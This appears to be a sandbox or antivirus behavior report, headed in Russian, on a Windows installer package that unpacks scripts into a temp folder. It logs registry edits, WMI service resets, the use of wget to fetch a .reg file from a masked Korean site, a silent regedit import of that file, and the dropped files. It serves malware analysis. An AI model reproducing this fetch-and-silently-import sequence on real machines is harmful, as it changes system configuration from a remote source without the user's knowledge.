Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\winmgmt\Parameters] 'ServiceDll' = '<SYSTEM32>\wbem\WMIsvc.dll'
- [<HKLM>\SYSTEM\ControlSet001\Services\winmgmt] 'ImagePath' = '<SYSTEM32>\svchost.exe -k netsvcs'
- [<HKLM>\SYSTEM\ControlSet001\Services\winmgmt] 'Start' = '00000002'
- '<SYSTEM32>\wscript.exe' "%TEMP%\RarSFX0\IIMS_INSTALLER_START.vbs"
- '%WINDIR%\regedit.exe' /s "trust_site.reg"
- '<SYSTEM32>\wbem\winmgmt.exe' /kill
- '<SYSTEM32>\wbem\winmgmt.exe' /regserver
- '<SYSTEM32>\wbem\winmgmt.exe' /unregserver
- '%TEMP%\RarSFX0\wget.exe' -c -O trust_site.reg http://www.in##r.co.kr/appGuide/appDownloads.php?ap################
- '<SYSTEM32>\wbem\winmgmt.exe' /clearadap
- '<SYSTEM32>\cmd.exe' /c %TEMP%\RarSFX0\xp_load_mgmt.cmd
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX0\trust_site.cmd" "%TEMP%\RarSFX0""
- '<SYSTEM32>\wbem\wmiadap.exe' /C
- %TEMP%\RarSFX0\UPHClean-Setup__Access is denied Userenv Error msg.msi
- %TEMP%\RarSFX0\wget.exe
- %TEMP%\RarSFX0\IIMS_INSTALLER_START.vbs
- %TEMP%\RarSFX0\trust_site.reg
- %TEMP%\RarSFX0\secure_desktop.vbs
- %TEMP%\RarSFX0\trust_site.cmd
- %TEMP%\RarSFX0\popup_site.cmd
- %TEMP%\RarSFX0\UPHClean_Setup.cmd
- %TEMP%\RarSFX0\iims_reinstaller.exe
- %TEMP%\RarSFX0\xp_load_mgmt.cmd
- %TEMP%\RarSFX0\trust_site.reg
- 'www.in##r.co.kr':80
- http://www.in##r.co.kr/appGuide/appDownloads.php?ap###############
- DNS ASK www.in##r.co.kr
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''